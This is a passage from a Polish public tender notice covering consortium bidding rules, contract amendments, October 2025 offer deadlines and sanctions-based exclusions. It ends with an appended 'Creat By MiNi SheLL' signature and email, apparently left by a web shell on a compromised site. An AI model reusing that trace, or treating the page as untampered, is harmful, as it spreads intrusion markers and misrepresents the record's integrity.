ofertę;<br/>2)	Wykonawcy tworzący jeden podmiot przedłożą wraz z ofertą stosowne pełnomocnictwo - nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę; UWAGA: pełnomocnictwo, o którym mowa powyżej (pkt 1 i 2) może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy podmiotów wspólnie składających ofertę;<br/>3)	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika); <br/>4)	Wszelka korespondencja dokonywana będzie wyłącznie z Wykonawcą występującym jako Pełnomocnik pozostałych;<br/>5)	Wskazanie lidera w druku oferty (w przypadku oferty złożonej przez konsorcjum);<br/>10.2.	W przypadku gdy oferta wspólna Wykonawcy zostanie najwyżej oceniona, Wykonawca przed udzieleniem zamówienia, składa na wezwanie Zamawiającego dokumenty o których mowa w rozdziale IX ust. 9.4. SWZ, przy czym dokumenty wymienione w rozdziale IX ust. 9.4. pkt 1)-3) SWZ składa odrębnie każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>10.3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z nich nie może podlegać wykluczeniu z postępowania na podst. art. 108 ust. 1 oraz art. 109. ust. 1 pkt 1, 4, 5 i 7 ustawy Pzp oraz na podst. art. 7 ust. 1 ustawy o przeciwdziałaniu wspieraniu agresji na Ukrainę.<br/>10.4.	Nie dopuszcza się uczestniczenia danego Wykonawcy w więcej niż jednej grupie Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym również jest złożenie przez jednego Wykonawcę równocześnie oferty indywidualnej oraz w ramach grupy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>10.5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>10.6.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W tym przypadku Wykonawca wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik nr 9 do SWZ (forma złożenia oświadczenia została opisana w ust. 16.5. i 16.6. SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:<br/>Zamawiający przewiduje możliwość wprowadzenia zmiany postanowień zawartej umowy w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru oferty Wykonawcy w przypadkach i na warunkach określonych w §17 projektowanych<br/>postanowieniach umowy – załącznik nr 3A (dot. zadania nr 2,5,6) i 3B (dot. zadania nr 1,3,4) do swz oraz w rozdziale XXI swz <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załacznikami nalezy składać za pośrednictwem platformy eb2b: https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-22 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający dopuszcza składanie ofert częściowych, co najwyżej na trzy zadania częściowe. Złożenie ofert na więcej niż trzy zadania częściowe, będzie skutkować odrzuceniem wszystkich ofert Wykonawcy z postępowania<br/><br/>Zamawiający informuje, że zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tj. Dz.U.<br/>2024 poz. 507 z p.zm.) z postępowania o udzielenie zamówienia wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy,<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym<br/>w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z<br/>2024 r. poz. 1124, 1285, 1723 i 1843) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o<br/>ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3 ww. ustawy,<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120, 295 i 1598) jest podmiot wymieniony w wykazach określonych<br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia<br/>24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 ww. ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com